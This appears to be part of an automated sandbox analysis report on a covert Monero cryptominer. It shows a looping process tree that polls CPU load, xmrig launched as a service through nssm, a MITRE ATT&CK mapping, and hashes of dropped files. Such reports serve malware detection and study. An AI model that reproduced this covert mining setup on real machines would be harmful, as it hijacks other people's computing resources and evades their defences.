                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:3668
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:432
                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4076
                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:3200
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1128
                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2256
                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                        PID:4516
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4052
                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3604
                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:3980
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4460
                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:1164
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:1256
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4092
                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3264
                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:2220
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4716
                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:3404
                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:2404
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:396
                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3580
                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                            PID:1132
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2308
                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:856
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1096
                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1236
                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:2312
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:488
                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3804
                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                        PID:2356
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4668
                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4696
                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                            PID:1656
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5036
                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3164
                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:2136
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:3036
                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:1416
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    PID:3624
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2844
                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:2168
                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                        PID:4332
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:2360
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:432
                                                                                                                                                                                                                                                        • C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:4740
                                                                                                                                                                                                                                                            • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\moneroocean\xmrig.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1688
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4128 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:3228

                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                              System Services

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1569

                                                                                                                                                                                                                                                              Service Execution

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1569.002

                                                                                                                                                                                                                                                              Command and Scripting Interpreter

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1059

                                                                                                                                                                                                                                                              PowerShell

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1059.001

                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                              Impair Defenses

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1562

                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                              Impact

                                                                                                                                                                                                                                                              Service Stop

                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                              T1489

                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                5b5352c55a8e79ac8de4be3202d496a1

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                4a263d9e36e5ef972e4b19035cae169e1df6459c

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                436a8ffe62732538dc4be4b84987527e

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                47ef91df1f059a5b2a99ddbff7935c3bc272bdd9

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                4c8cc423fc77cf7ad49634003d9daee11af744a398e42b17ec5a6e44092d976e

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                aed5b350fcb83f9e89cc2a103198c03df9bb1d1e689165861dea1a96425973dadc9982e3a9738152f1fbac7f078dee6909e11cafba226f82c87b6fa301bdc43f

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                fcee6b45a6071b49a1ea29138c884f34

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                7dab62945252358b41cd754caa59641a1d6db516

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                6ee8562f512fdd88e645a580f3eaf2bafd2e5c9f0044acaa3f99b07e352e67c9

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                8ba5477eff705aeebc052e56917dda12a92293b8619cfedd4045352cea9278d36d80a712cfd5cba69a9029ed64a0888f006d480c53bed387cd1e99938cd0bdc8

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                f7db76c94074459f0a2b798ab3af562e

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                f63f76815cbca71b0a3aa75d9c4679722ba8a1f6

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                8bb445d527beff482a69312efaaef8596e54470c226261973f8b03b83dfd31df

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                4b98534a2074a5259deac0e155d88b0fefae4a7de25de2d181efd9b01db6453a2e90a14cede33329682608a77183f89ec6bcfaf148e7e83fc9a93d2282e2506e

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                78d3dcc5dbeec2a3ac1c3999319343e9

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                c5799937c5b7bbe20d59cbb2500d6dbf48e22eac

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                dc9e3f1bba394e0e757b11a9af1907c0a6cf9e30c83edd92f95777ba9f902965

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                083fe92dd197e956b6095a1819290a10a7925b9e1bd82499c441312e2acfa545f188e6b196f76e64f31bb3979297e323712614202b7d1f5d9faffbabf8ba3773

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                74fd3bb20b5c047c4ef9ff119744dc1f

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                26ffb8c890a071c7c73c7e90789c4f2f709ddb2d

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                950d6a3f91c5f3f823e14f14390f1ad57ddf504256262a778ca1ebe1fb91d2cf

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                f1600c164f93cafa4b0e393892b386bf0ef98939316aabf9a90106b8fa3116adae2745a0c8037e72532e2462b973cf8aabb89ceecf9c469d0a2b0a3194c9ae3e

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                143a478fb47996f74bbbcdaa252b9e0b

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                288893a45c1c50f8245a32aa06dfb1ac2ff31c83

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                113ce74e0e5ffcca60bd287f16e84890

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                81ddf923d248b3f12817da4f688c152c33ec48ba

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                5506e6f77df931211e1f1abd3b1e8d45269a455ed277f295628f8cc51f678bdf

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                e547782f7d912f771efc81c1bb935c7ff1ed15d9741cbed2f5554afd14c923fe9026f56b1d93c5018cb041b42c82240fea7cd4903b2b1238ea9438780e8ed944

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                708d43aea6034880393a5dc30c00c7e2

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                2b302b197a76d833e4900b221dcf916fe4593a96

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                727c02fdd0b6c42dc6c8e7a79994111bfa545dba389c47a36d39d0db9d86b494

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                2f744ce75d8c812876c7cc2f250165f0e648456462cba3014ab1af8891aff4b99f5157ca0f5a89356bc313132842e397f9d1527d01437935298168285ff93ee7

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                1a3a11831437b7981da201cfdb711be0

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                acd27915534a7ef80d726f529f6a4f83162d4a79

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                c4d7a00396efec4a5431d37d8b35839db98ede2f9f48aa90879f29ac92720d83

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                066ae740c0e4900da43cb3f7901d75adba752086af516e9c7fed91c45fdc244c407338860d7c62ad2c079726a34d6db1ef7e63e7cf3532856730a30de1c9f341

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g14r4f1x.zcq.ps1
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                60B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpEB5A.tmp.bat
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                14KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                623f6006f683afdb4b7406e3a4ec35bf

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                f63f03d7338317224726eba368f1a045fa2142d7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                725d38d9eeadc9c2691063936b01f9ec

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                153fd5bd55cfd845516562291a7ab867d68145b5

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                64cafb884608c751a2bccaca7c582e0f

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                8b25f31750a1bd2a5184de93c2f727c6

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                a12969638354fc5268be07eda6bc4352cc40d488

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                aa99ae2f4627f2d7e2a9c19474248667b8654d02f68cacbb2d644ee6e6de9da4

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                b3d6c24f246d0e2afd58a4dec93007df1afaf70ea3394c03d8d661cf06570b5c6ca0337524f503b2cef113da70b65d482b8d53d77bca4941fc99a2e918f415ca

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                993bb26789d07c6ba3d0483e1697f66b

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                9ccb7876dc4ddb65b2aba03737bc708f231704d5

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                be170c95c392fec2dda13b4f6710cac7e9f2cf1b59d5e0ea9e3ab1906453025b

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                753c77dbcea361b403abd05bd594af8c924b246960b8e9375dcc51d75d47abf08af37eefa2ea3139301cf97c5cd27c71834155f53f00565495f78f01c006dc5a

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                71469039aeadb148b9be6bef59efea0e

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                368aae717236f31850399ff06a973dc7e6dafedf

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                a959d78ed05393b0ee462c47573deb247d69a495e5fb2eb7991c99d60b48bac2

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                fd242b21996fb01f62cd6d23cd899b39890528918cd8fd145c82a4af4069b0278e601536ccecbf9d077a1c6e680a1cad416067878a72a06ea50a6546375f56f9

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                d4f8a13f8c90e2b3b2e7d30a553df39c

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                5c5303ef682ffcd31e57d1abd900ba5b637d51e4

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                c9ef9c214996db3d88f571226910c5d5

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                420ba30247b1e09f706557a7704a1ebee5d3165c

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

                                                                                                                                                                                                                                                                SHA512

